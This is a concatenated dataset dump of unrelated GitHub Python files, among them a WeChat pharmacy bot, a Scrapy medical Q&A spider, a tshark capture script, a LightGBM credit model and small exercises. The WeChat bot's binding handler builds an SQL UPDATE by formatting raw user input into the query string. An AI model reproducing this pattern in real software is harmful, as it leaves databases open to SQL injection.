(在门店每消费一元累积一个积分)'.format(points)\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), msg)\n else:\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '查询失败,您未绑定会员号或者您还没有积分记录')\n elif 'EventKey' in data and data['EventKey'] == 'HUI_USER_DRUGS':\n self.wx_user.state = WXStateQueryDrugs(self.wx_user)\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '请输入药品名称:')\n elif 'EventKey' in data and data['EventKey'] == 'HUI_USER_PURCHASE':\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '该功能正在开发,敬请期待')\n elif 'EventKey' in data and data['EventKey'] == 'HUI_USER_MESSAGE':\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '该功能正在开发,敬请期待')\n elif 'EventKey' in data:\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '公众号暂时无法识别该指令')\n elif 'Content' in data:\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '公众号无法识别您的输入,您可以通过菜单发起指令')\n \nclass WXStateBonding:\n def __init__(self, WX_Manager):\n self.wx_manager = WX_Manager\n\n def handle(self, data):\n if 'Content' in data:\n sql = \"UPDATE BM_WLDW SET 
CZ='{0}' WHERE DH = '{1}'\".format(self.wx_manager.wx_id , data['Content'])\n json_data={}\n json_data['SQL']=sql\n json_data = DBProxy_exec(json_data)\n self.wx_manager.state = WXStateInit(self.wx_manager)\n if json_data and json_data[0] == 1:\n return reply_text_template.format(self.wx_manager.wx_id, wx_gz_id, int(time.time()), '绑定成功')\n else:\n return reply_text_template.format(self.wx_manager.wx_id, wx_gz_id, int(time.time()), '绑定失败,若您还不是会员,可至门店注册,或给留言“注册会员+手机号码”')\n else:\n return reply_text_template.format(self.wx_manager.wx_id, wx_gz_id, int(time.time()), '目前正在绑定会员,请输入在门店注册会员时登记的手机号码:')\n \nclass WXStateQueryDrugs:\n def __init__(self, WXUser):\n self.wx_user = WXUser\n\n def handle(self, data):\n if 'Content' in data:\n data = DBProxy_getDrugs(data['Content'],self.wx_user.getShop())\n \n if len(data) > 10:\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), '查询结果过多,请您提供更准确的药品名称:')\n\n self.wx_user.state = WXStateInit(self.wx_user)\n result = \"名称\\t厂家\\t数量\\n--------------------\"\n for item in data:\n if item[0] > 0:\n result = \"{0}\\n{1}\\t{2}\\t{3}\".format(result, item[1], item[2], item[0])\n result = result + \"\\n--------------------\\n查询成功,数据可能存在误差,仅供参考\"\n return reply_text_template.format(self.wx_user.wx_id, wx_gz_id, int(time.time()), result)\n else:\n return reply_text_template.format(self.wx_manager.wx_id, wx_gz_id, int(time.time()), '目前正在查询药品,请输入药品名称:')\n\nclass WXManager:\n cached_user = {}\n def __init__(self, WX_ID):\n self.wx_id = WX_ID\n self.state = WXStateInit(self)\n self.time = int(time.time())\n self.phone, self.shop = DBProxy_getUser(WX_ID)\n\n def getPhone(self):\n return self.phone\n\n def getShop(self):\n return self.shop\n\n def isExpired(self,cur_time):\n if cur_time - self.time > 300:\n return True\n return False\n\n def handle(self,data):\n result = self.state.handle(data)\n return result\n\n @staticmethod\n def getUser(WX_ID):\n if WX_ID not in WXManager.cached_user:\n WXManager.cached_user[WX_ID] = WXManager(WX_ID)\n return WXManager.cached_user[WX_ID]\n\n @staticmethod\n def remove(WX_ID):\n if WX_ID in WXManager.cached_user:\n print(\"WXManager remove {0} from cache\".format(WX_ID))\n WXManager.cached_user.pop(WX_ID)\n\n @staticmethod\n def expire():\n expire_list = []\n int_time = int(time.time())\n for wx_id in WXManager.cached_user:\n wx_user=WXManager.getUser(wx_id)\n if wx_user.isExpired(int_time):\n expire_list.append(wx_id)\n for wx_id in expire_list:\n WXManager.remove(wx_id)\n timer = threading.Timer(200,WXManager.expire)\n timer.start()\n\ntimer = threading.Timer(200,WXManager.expire)\ntimer.start()\n","repo_name":"yelloworangecc/website","sub_path":"py/WXManager.py","file_name":"WXManager.py","file_ext":"py","file_size_in_byte":8228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27269954335","text":"import numpy as np\n\na = np.array([1, 1, -129, 171, 1620])\np = np.poly1d(a)\nspace = np.arange(-46, 15)\nminmax = np.array([float('inf'), float('-inf')])\nfor x in space:\n y = p(x)\n minmax[0] = min(minmax[0], y)\n minmax[1] = max(minmax[1], y)\nprint(minmax)","repo_name":"cozajeden/Podstawy_Sterowania_Optymalnego","sub_path":"snippets/lab1/zad3_1.py","file_name":"zad3_1.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17259600794","text":"import logging\nfrom .AnaplanConnection import AnaplanConnection\nfrom .util.Util import 
ResourceNotFoundError\nfrom .util.AnaplanVersion import AnaplanVersion\nfrom .AnaplanRequest import AnaplanRequest\n\nlogger = logging.getLogger(__name__)\n\n\nclass Resources:\n @staticmethod\n def get_resource_request(conn: AnaplanConnection, resource: str) -> AnaplanRequest:\n \"\"\"Get the list of items of the specified resource\n\n\n \"\"\"\n base_url = f\"https://api.anaplan.com/{AnaplanVersion.major()}/{AnaplanVersion.minor()}/workspaces/\"\n valid_resources = [\"imports\", \"exports\", \"actions\", \"processes\", \"files\", \"lists\", \"modules\"]\n get_header = {\n 'Content-Type': 'application/json'\n }\n\n if resource.lower() in valid_resources:\n url = ''.join([base_url, conn.get_workspace(), \"/models/\", conn.get_model(), \"/\", resource.lower()])\n return AnaplanRequest(url=url, header=get_header)\n else:\n raise ResourceNotFoundError(f\"Invalid selection, resource must be one of {', '.join(valid_resources)}\")\n\n @staticmethod\n def parse_resource_request():\n pass\n","repo_name":"jeswils-ap/anaplan_transactional_api","sub_path":"src/anaplan_api/Resources.py","file_name":"Resources.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30473354282","text":"from abc import ABC, abstractmethod\nimport numpy as np\nimport logging\n\n#from typing import Tuple\nimport numpy.typing as npt\n\nPrices = npt.NDArray\nBundle = npt.NDArray\n\nclass VolumeBundle:\n value : Bundle\n volume : Bundle\n def __init__(self, value, volume):\n assert np.all(volume>= 0)\n assert np.shape(value) == np.shape(volume)\n self.value = value\n self.volume = volume\n\n @classmethod\n def zero(cls, shape):\n return VolumeBundle(np.zeros(shape), np.zeros(shape))\n\n def __add__(self, other):\n assert isinstance(other, VolumeBundle)\n assert other.shape() == self.shape()\n logging.debug(\"add creates new volume bundle\")\n return VolumeBundle(self.value + other.value,\n self.volume + other.volume)\n\n def __iadd__(self, other):\n assert isinstance(other, VolumeBundle)\n assert other.shape() == self.shape()\n self.value += other.value\n self.volume += other.volume\n return self\n\n def add_at_ix(self, ix : int, value : float): \n self.value[ix] += value\n self.volume[ix] += abs(value)\n\n def add_at_slice(self, sl : slice, other):\n assert isinstance(other, VolumeBundle)\n assert other.shape() == self.value[sl].shape\n self.value[sl] += other.value\n self.volume[sl] += other.volume\n \n def __str__(self):\n return str(self.value) + \" with volume \" + str(self.volume)\n\n def shape(self):\n return self.value.shape\n\n\nclass Participant(ABC):\n @abstractmethod\n def participate(self, prices : Prices) -> VolumeBundle:\n ...\n\n","repo_name":"johannesmarti/pytrade","sub_path":"core/participant.py","file_name":"participant.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11541675036","text":"#!/usr/bin/env python3.6\n\n# -*- coding: utf-8 -*-\n\n\"\"\"\n__author__ = 'jasonqu'\n\n__date__ = '2018/5/29'\n\n__QQ__ = '376205871'\n\n\"\"\"\nfrom scrapy.spiders import Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom corpus_health.items import CorpusHealthItem\nfrom scrapy_redis.spiders import RedisCrawlSpider\nimport urllib.parse\nfrom math import floor\nimport re\n\nfrom corpus_health.Util.LogHandler import LogHandler\nlogger = LogHandler(__name__, stream=True)\n\nclass 
Ask120Spider(RedisCrawlSpider):\n handle_httpstatus_list = [404, 403, 500]\n name = 'ask120'\n allowed_domains = ['120ask.com']\n # start_urls = [\n # 'http://www.120ask.com/list/gaoxueya/',\n # 'http://www.120ask.com/list/gaoxueya/all/2/'\n # 'http://www.120ask.com/list/tangniaobing/'\n # 'http://www.120ask.com/list/guanxinbing/'\n # 'http://www.120ask.com/list/ganmao/'\n # 'http://www.120ask.com/list/jingzhuibing/'\n # 'https://www.120ask.com/list/zhifanggan/'\n # 'http://www.120ask.com/list/tongfeng/'\n # 'https://www.120ask.com/list/laonianchidai/'\n # 'https://www.120ask.com/list/yaozhuibing/'\n # ]\n redis_key = 'ask120:start_urls'\n\n rules = (\n Rule(LinkExtractor(allow=r\"//www.120ask.com/list/gaoxueya/all/\\d+/$\"), follow=True),\n Rule(LinkExtractor(allow=r\"http://www.120ask.com/question/\\d+\\.htm$\"), callback=\"parse_detail_mongo\", follow=False),\n )\n\n def parse_detail(self, response):\n item = CorpusHealthItem()\n try:\n item['url'] = response.url\n item['question'] = response.xpath('//p[@class=\"crazy_new\"]/text()').extract()[1].strip()\n answerList = response.xpath('//div[@class=\"b_anscont_cont\"][1]/div[@class=\"crazy_new\"]/p/text()').extract()\n answer = \"\".join(answerList)\n item['answer'] = \"\".join(answer.split())\n yield item\n except Exception as e:\n print(e)\n logger.info(\"匹配信息出错。错误原因:\")\n logger.info(e)\n\n def parse_detail_mongo(self, response):\n item = CorpusHealthItem()\n try:\n item['url'] = response.url\n question = response.xpath('//h1[@id=\"d_askH1\"]').extract()[0]\n askTxt = self.filter_tags_blank(question)\n try:\n desc = response.xpath('//p[@class=\"crazy_new\"][1]').extract()[0]\n descText = self.filter_tags_blank(desc)\n except Exception as e:\n descText = ''\n item['question'] = {'askText': askTxt, 'askDesc': descText}\n try:\n answerList = response.xpath('//div[@class=\"b_anscont_cont\"]')\n itemList = []\n for index, answerli in enumerate(answerList):\n answer_each = answerli.xpath('.//div[@class=\"crazy_new\"]/p/text()').extract()\n answer = \"\".join(answer_each)\n itemList.append(\"\".join(answer.split()))\n item['answer'] = itemList\n except Exception as e:\n item['answer'] = ''\n # print(item)\n # print(item['answer'])\n yield item\n except Exception as e:\n print(e)\n logger.info(\"匹配信息出错。错误原因:\")\n logger.info(e)\n\n \"\"\"\n 去掉html标签和空格\n \"\"\"\n def filter_tags_blank(self, str):\n p = re.compile('<[^>]+>').sub(\"\", str)\n return \"\".join(p.split())\n","repo_name":"bzqweiyi/Algorithm","sub_path":"Corpus/corpus_health/spiders/spider_120ask.py","file_name":"spider_120ask.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7522863346","text":"# Oliver Hollis\n# CTI 110\n# M5HW2: Running Total\n# Oct 27 2017\n\n# Write a program that asks the user to enter a series of numbers.\n# It should loop, adding these numbers to a running total, until the\n# user enters a negative number. When a negative number is entered,\n# the program should exit the loop. (It should not add the negative\n# number to the total.) 
The program should then print the total before\n# exiting.\n\ndef main():\n\n # the sum equals 0 until added\n \n total = 0\n\n # user inputs #'s used \"float\" for decimals input \n\n number_entered = float(input( \"Enter the first #: \"))\n\n # \"while\" keeps answering user for info until quit with -1\n\n while number_entered > -1:\n total = total + number_entered\n number_entered = float(input(\"Enter next # or a -1 to stop: \"))\n\n # display sum \n\n print(\"Your total: \", total)\n \n\nmain() \n","repo_name":"holliso/cti110","sub_path":"M5HW2_Running Total_holliso.PY","file_name":"M5HW2_Running Total_holliso.PY","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10251069422","text":"def selection_sort(unsorted):\n n = len(unsorted)\n\n for i in range(n - 1):\n min_index = i # assume 1st element is minimum\n # scan to find the real minimum number\n for j in range(i + 1, n):\n if unsorted[j] < unsorted[min_index]:\n min_index = j\n\n tmp = unsorted[i]\n unsorted[i] = unsorted[min_index]\n unsorted[min_index] = tmp\n\n return unsorted\n\n\nif __name__ == '__main__':\n # numbers = [4, 2, 5, 7, 1, 3]\n numbers = [7, 5, 4, 3, 2, 1]\n print(selection_sort(numbers))\n","repo_name":"perrydzhu/pydem0","sub_path":"algorithm/sorting/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21455253025","text":"# -*- coding: utf-8 -*-\nclass Solution(object):\n def countCornerRectangles(self, grid):\n \"\"\"\n Time: O(m**2*n)\n Space: O(1)\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n res = 0\n for i in range(len(grid)-1):\n for j in range(i+1, len(grid)):\n count = 0\n for v1, v2 in zip(grid[i],grid[j]):\n if v1 == v2 == 1:\n res += count\n count += 1\n return res","repo_name":"jerrt2003/leetcode-in-python","sub_path":"Interview_Feedback/Google/750. 
Number Of Corner Rectangles/Solution1.py","file_name":"Solution1.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38933632927","text":"#these functions read and manage kiinteisto/adderess register either from local file\r\n#or from given address\r\n\r\n\r\ndef kiinteisto(url):\r\n \r\n \"\"\"reads kiinteisto data from Finnish registes\r\n \r\n args:\r\n url: the latest kiinteisto URL\r\n \r\n Exsample of url = \"https://www.avoindata.fi/data/dataset/cf9208dc-63a9-44a2-9312-bbd2c3952596/resource/ae13f168-e835-4412-8661-355ea6c4c468/download/suomi_osoitteet_2020-05-15.7z\"\r\n \r\n the data is in sevenZipfile\r\n Python py7zr library supports 7zip archive management\r\n https://pypi.org/project/py7zr/\r\n \r\n Description of kiinteistodata\r\n https://www.avoindata.fi/data/dataset/cf9208dc-63a9-44a2-9312-bbd2c3952596/resource/ae13f168-e835-4412-8661-355ea6c4c468\r\n\r\n Returns:\r\n register of kiinteisto\r\n \"\"\"\r\n import requests \r\n import os\r\n import py7zr\r\n import io\r\n import pandas as pd\r\n from supportfunctions import add_zeros\r\n import tempfile\r\n\r\n r = requests.get(url)\r\n archive = py7zr.SevenZipFile(io.BytesIO(r.content))\r\n \r\n with tempfile.TemporaryDirectory() as local_path:\r\n print('created temporary directory', local_path)\r\n archive.extractall(path=local_path)\r\n datafile = os.path.join(local_path, archive.getnames()[0] )\r\n archive.close()\r\n kiinteisto=pd.read_csv(datafile,sep=\";\", header=None, encoding=\"ISO-8859-1\", low_memory=False)\r\n kiinteisto.columns=['Rakennustunnus','Kuntanumero','Maakunta','Käyttötarkoitus',\r\n 'Pohjoiskoordinaatti','Itäkoordinaatti','Osoitenumero','Kadunnimi suomeksi',\r\n 'Kadunnimi ruotsiksi','Katunumero','Postinumero','Äänestysalue','Äänestysalueen nimi suomeksi',\r\n 'Äänestysalueen nimi ruotsiksi','Sijaintikiinteistö','Tietojen poimintapäivä']\r\n\r\n df_obj = kiinteisto.select_dtypes(['object'])\r\n kiinteisto[df_obj.columns] = df_obj.apply(lambda x: x.str.strip())\r\n\r\n kiinteisto['Postinumero'] = kiinteisto['Postinumero'].apply(add_zeros)\r\n #äänestysalue ja kuntanumero samaan alue dataan, käytetään myöhemmin\r\n kiinteisto.loc[(kiinteisto['Äänestysalue'].notna()) & (kiinteisto['Kuntanumero'].notna()), 'Alue'] = kiinteisto.loc[kiinteisto['Kuntanumero'].notna(), 'Kuntanumero'].astype(int).astype(str) + \"-\" + kiinteisto.loc[kiinteisto['Äänestysalue'].notna(), 'Äänestysalue']\r\n\r\n return(kiinteisto)\r\n\r\n\r\n\r\n\r\ndef read_kiinteisto(path, url_kiinteisto):\r\n \r\n \"\"\"This function reads all needed data\r\n either from file or calls a function to fetch data\r\n via API calls directly from sources and then writes data to files\r\n\r\n Args:\r\n path: path, where the data is stored \r\n url_kiinteisto: \r\n https://www.avoindata.fi/data/dataset/cf9208dc-63a9-44a2-9312-bbd2c3952596/resource/ae13f168-e835-4412-8661-355ea6c4c468\r\n\r\n \r\n Returns:\r\n kiinteisto: dataframe of kiinteisto\r\n\r\n \"\"\"\r\n\r\n import pandas as pd \r\n import os\r\n import inspect\r\n from supportfunctions import add_zeros\r\n\r\n #read post and muncipalities\r\n filename_kiinteisto = 'kiinteisto.csv'\r\n\r\n filename_kiinteisto = os.path.join(path, filename_kiinteisto)\r\n\r\n if os.access(filename_kiinteisto, os.R_OK):\r\n #read it from files\r\n print(inspect.stack()[0][3],' read from file')\r\n kiinteisto_data = pd.read_csv(filename_kiinteisto, encoding=\"ISO-8859-1\", low_memory=False)\r\n 
kiinteisto_data.loc[:,'Postinumero'] = kiinteisto_data['Postinumero'].apply(add_zeros)\r\n\r\n else:\r\n #read kiinteistodata\r\n print(inspect.stack()[0][3],' read from API')\r\n kiinteisto_data = kiinteisto(url_kiinteisto)\r\n kiinteisto_data.to_csv(filename_kiinteisto, index=False, encoding=\"ISO-8859-1\")\r\n return(kiinteisto_data)\r\n\r\n","repo_name":"launis/areadata","sub_path":"read_kiinteisto.py","file_name":"read_kiinteisto.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"fi","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13973975615","text":"import os\nfrom scapy.all import *\nimport time\nimport subprocess\n\ndef run_bash(bashCommand):\n process = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)\n process.wait()\n output, error = process.communicate()\n return output\n\ndef run_export_objects():\n process = subprocess.Popen([\"sudo\", \"tshark\", \"-r\", pcap_name, \"--export-object\", 'http,./output/'], stdout=subprocess.PIPE)\n process.wait()\n output, error = process.communicate()\n return output\n\nwhile True:\n pcap_name = str(time.time())+\".pcap\"\n\n print(\"pcap_name:\", pcap_name)\n\n print(\"Starting capture...\")\n\n run_bash(\"touch \"+pcap_name)\n run_bash(\"chmod 777 \"+pcap_name)\n run_bash(\"sudo tshark -i ens33 -w \"+ pcap_name + \" -c 500\")\n\n print(\"Ended capture...\")\n\n run_bash(\"sudo tshark -r \" +pcap_name+ \" --export-object http,./output/\")\n\n run_bash(\"ls output\")\n\n \n\n\n\n","repo_name":"Fishbiscuit/div0","sub_path":"pcap.py","file_name":"pcap.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19024630848","text":"from math import *\nimport os\nos.system(\"cls\")\nmy_num= 5\nyour_num= -10\nprint(abs(your_num)) # to get the absolute value of any num.\nprint(max(my_num, your_num,6,10,192,192,1,232,34)) # to get the largest one of them.\nprint(round(3.4)) # to get the roundfigure.\nprint(floor(5.12345)) # in math function and use to get only the without decimal value.\nprint(ceil(3.1)) # in math function and use to get a number up.\na= float(input(\"Enter a number:- \"))\nb= float(input(\"Enter another number:- \"))\nresult= a+b\nprint(result)\nfriends=[\"Abhay\", \"Jatin\", \"Jaismine\", \"Jainy\"]\nnumbers=[10,20]\nfriends.extend(numbers)\nprint(friends)","repo_name":"Awesome-Abhay/Python-Programs","sub_path":"new8.py","file_name":"new8.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42156045864","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.ensemble import ExtraTreesClassifier\nimport numpy as np\nimport os\n\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_val_score\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import MinMaxScaler, LabelEncoder\nfrom sklearn.metrics import accuracy_score, roc_auc_score, confusion_matrix\nfrom sklearn.feature_selection import VarianceThreshold\nimport lightgbm as lgb\nimport seaborn as sns\n\nPATH = os.getenv('HOME')+'/.kaggle/competitions/home-credit-default-risk/'\n#PATH = \"/Users/Ojasvi/.kaggle/competitions/home-credit-default-risk/\"\n\nprint(\"Importing data...\")\ndataframe = pd.read_csv(PATH + \"application_train.csv\")\ntest = pd.read_csv(PATH + 
'application_test.csv')\nprev = pd.read_csv(PATH + 'previous_application.csv')\nbureau = pd.read_csv(PATH + 'bureau.csv')\nbureau_balance = pd.read_csv(PATH + 'bureau_balance.csv')\ncredit_card = pd.read_csv(PATH + 'credit_card_balance.csv')\nPOS_CASH = pd.read_csv(PATH + 'POS_CASH_balance.csv')\npayments = pd.read_csv(PATH + 'installments_payments.csv')\nlgbm_sub = pd.read_csv(PATH + 'sample_submission.csv')\n\nprint('The shape of our features is:', dataframe.shape)\n\n# Dropping rows with NaN values\n# IMPUTATION HERE PLS\n#dataframe.dropna(inplace=True)\n\n# seperate target variable\nlabels = np.array(dataframe['TARGET'])\ndataframe = dataframe.drop('TARGET', axis = 1)\nfeature_list = list(dataframe.columns)\n\n# One Hot Encoding - converts categorical data in training into numerical\ncat_features = [col for col in dataframe.columns if dataframe[col].dtype == 'object']\n\n# concatenate training and test and do one hot encoding\none_hot = pd.concat([dataframe, test])\none_hot = pd.get_dummies(one_hot, columns=cat_features)\n\n# seperate back to training and test sets after one hot encoding\ndataframe = one_hot.iloc[:dataframe.shape[0],:] \ntest = one_hot.iloc[dataframe.shape[0]:,] \n\nprint('The shape of our features is:', dataframe.shape)\n\n#Pre-processing bureau_balance\nprint('Pre-processing bureau_balance...')\nbureau_grouped_size = bureau_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].size()\nbureau_grouped_max = bureau_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].max()\nbureau_grouped_min = bureau_balance.groupby('SK_ID_BUREAU')['MONTHS_BALANCE'].min()\n\nbureau_counts = bureau_balance.groupby('SK_ID_BUREAU')['STATUS'].value_counts(normalize = False)\nbureau_counts_unstacked = bureau_counts.unstack('STATUS')\nbureau_counts_unstacked.columns = ['STATUS_0', 'STATUS_1','STATUS_2','STATUS_3','STATUS_4','STATUS_5','STATUS_C','STATUS_X',]\nbureau_counts_unstacked['MONTHS_COUNT'] = bureau_grouped_size\nbureau_counts_unstacked['MONTHS_MIN'] = bureau_grouped_min\nbureau_counts_unstacked['MONTHS_MAX'] = bureau_grouped_max\n\nbureau = bureau.join(bureau_counts_unstacked, how='left', on='SK_ID_BUREAU')\n\n#Pre-processing previous_application\nprint('Pre-processing previous_application...')\n#One-hot encoding of categorical features in previous application data set\nprev_cat_features = [pcol for pcol in prev.columns if prev[pcol].dtype == 'object']\nprev = pd.get_dummies(prev, columns=prev_cat_features)\navg_prev = prev.groupby('SK_ID_CURR').mean()\ncnt_prev = prev[['SK_ID_CURR', 'SK_ID_PREV']].groupby('SK_ID_CURR').count()\navg_prev['nb_app'] = cnt_prev['SK_ID_PREV']\ndel avg_prev['SK_ID_PREV']\n\n#Pre-processing bureau\nprint('Pre-processing bureau...')\n#One-hot encoding of categorical features in bureau data set\nbureau_cat_features = [bcol for bcol in bureau.columns if bureau[bcol].dtype == 'object']\nbureau = pd.get_dummies(bureau, columns=bureau_cat_features)\navg_bureau = bureau.groupby('SK_ID_CURR').mean()\navg_bureau['bureau_count'] = bureau[['SK_ID_BUREAU', 'SK_ID_CURR']].groupby('SK_ID_CURR').count()['SK_ID_BUREAU']\ndel avg_bureau['SK_ID_BUREAU']\n\n#Pre-processing POS_CASH\nprint('Pre-processing POS_CASH...')\nle = LabelEncoder()\nPOS_CASH['NAME_CONTRACT_STATUS'] = le.fit_transform(POS_CASH['NAME_CONTRACT_STATUS'].astype(str))\nnunique_status = POS_CASH[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').nunique()\nnunique_status2 = POS_CASH[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').max()\nPOS_CASH['NUNIQUE_STATUS'] = 
nunique_status['NAME_CONTRACT_STATUS']\nPOS_CASH['NUNIQUE_STATUS2'] = nunique_status2['NAME_CONTRACT_STATUS']\nPOS_CASH.drop(['SK_ID_PREV', 'NAME_CONTRACT_STATUS'], axis=1, inplace=True)\n\n#Pre-processing credit_card\nprint('Pre-processing credit_card...')\ncredit_card['NAME_CONTRACT_STATUS'] = le.fit_transform(credit_card['NAME_CONTRACT_STATUS'].astype(str))\nnunique_status = credit_card[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').nunique()\nnunique_status2 = credit_card[['SK_ID_CURR', 'NAME_CONTRACT_STATUS']].groupby('SK_ID_CURR').max()\ncredit_card['NUNIQUE_STATUS'] = nunique_status['NAME_CONTRACT_STATUS']\ncredit_card['NUNIQUE_STATUS2'] = nunique_status2['NAME_CONTRACT_STATUS']\ncredit_card.drop(['SK_ID_PREV', 'NAME_CONTRACT_STATUS'], axis=1, inplace=True)\n\n#Pre-processing payments\nprint('Pre-processing payments...')\navg_payments = payments.groupby('SK_ID_CURR').mean()\navg_payments2 = payments.groupby('SK_ID_CURR').max()\navg_payments3 = payments.groupby('SK_ID_CURR').min()\ndel avg_payments['SK_ID_PREV']\n\n#Join data bases\nprint('Joining databases...')\ndataframe= dataframe.merge(right=avg_prev.reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(right=avg_prev.reset_index(), how='left', on='SK_ID_CURR')\n\ndataframe= dataframe.merge(right=avg_bureau.reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(right=avg_bureau.reset_index(), how='left', on='SK_ID_CURR')\n\ndataframe= dataframe.merge(POS_CASH.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(POS_CASH.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')\n\ndataframe= dataframe.merge(credit_card.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(credit_card.groupby('SK_ID_CURR').mean().reset_index(), how='left', on='SK_ID_CURR')\n\ndataframe= dataframe.merge(right=avg_payments.reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(right=avg_payments.reset_index(), how='left', on='SK_ID_CURR')\n\ndataframe= dataframe.merge(right=avg_payments2.reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(right=avg_payments2.reset_index(), how='left', on='SK_ID_CURR')\n\ndataframe= dataframe.merge(right=avg_payments3.reset_index(), how='left', on='SK_ID_CURR')\ntest = test.merge(right=avg_payments3.reset_index(), how='left', on='SK_ID_CURR')\n\n#Remove features with many missing values\nprint('Removing features with more than 80% missing...')\ntest = test[test.columns[dataframe.isnull().mean() < 0.85]]\ndataframe= dataframe[dataframe.columns[dataframe.isnull().mean() < 0.85]]\n\n#Delete customer Id\ndel dataframe['SK_ID_CURR']\ndel test['SK_ID_CURR']\n\n#Create train and validation set\ntrain_x, valid_x, train_y, valid_y = train_test_split(dataframe, labels, test_size=0.2, shuffle=True)\n\n#------------------------Build LightGBM Model-----------------------\ntrain_data=lgb.Dataset(train_x,label=train_y)\nvalid_data=lgb.Dataset(valid_x,label=valid_y)\n\n#Select Hyper-Parameters\nparams = {'boosting_type': 'gbdt',\n 'max_depth' : 10,\n 'objective': 'binary',\n 'nthread': 5,\n 'num_leaves': 64,\n 'learning_rate': 0.05,\n 'max_bin': 512,\n 'subsample_for_bin': 200,\n 'subsample': 1,\n 'subsample_freq': 1,\n 'colsample_bytree': 0.8,\n 'reg_alpha': 5,\n 'reg_lambda': 10,\n 'min_split_gain': 0.5,\n 'min_child_weight': 1,\n 'min_child_samples': 5,\n 'scale_pos_weight': 1,\n 'num_class' : 1,\n 'metric' : 'auc'\n }\n\n#Train model on selected parameters and number of iterations\nlgbm = 
lgb.train(params,\n train_data,\n 2500,\n valid_sets=valid_data,\n early_stopping_rounds= 40,\n verbose_eval= 10\n )\n\n#Predict on test set and write to submit\npredictions_lgbm_prob = lgbm.predict(test)\n\nlgbm_sub.TARGET = predictions_lgbm_prob\n\nlgbm_sub.to_csv('lgbm_submission.csv', index=False)\n\n#Plot Variable Importances\nlgb.plot_importance(lgbm, max_num_features=21, importance_type='split')\nplt.show()\n","repo_name":"ainharan/COMP9417-Project","sub_path":"lgbm.py","file_name":"lgbm.py","file_ext":"py","file_size_in_byte":8450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15114804726","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nimport pygame\n\n\nclass GameMenu:\n # Define the initalize self options\n def __init__(self, start=0, *options):\n self.options = options\n self.x = 0\n self.y = 0\n self.font = pygame.font.Font(None, 32)\n self.option = start\n self.width = 1\n self.color = [0, 0, 0]\n self.hcolor = [0, 0, 0]\n self.height = len(options) * self.font.get_height()\n for o in options:\n text = o[0]\n ren = self.font.render(text, 1, (0, 0, 0))\n if ren.get_width() > self.width:\n self.width = ren.get_width()\n\n # Draw the menu\n def draw(self, surface):\n i = 0\n for o in self.options:\n if i == self.option:\n clr = self.hcolor\n else:\n clr = self.color\n text = o[0]\n ren = self.font.render(text, 1, clr)\n if ren.get_width() > self.width:\n self.width = ren.get_width()\n surface.blit(ren, (self.x, self.y + i * self.font.get_height()))\n i += 1\n\n # Handle events\n def update(self, events):\n for e in events:\n if e.type == pygame.KEYDOWN:\n if e.key == pygame.K_UP:\n self.option -= 1\n elif e.key == pygame.K_DOWN:\n self.option += 1\n elif e.key == pygame.K_RETURN:\n self.options[self.option][1]()\n if self.option > len(self.options) - 1:\n self.option = 0\n elif self.option < 0:\n self.option = len(self.options) - 1\n\n # Position of 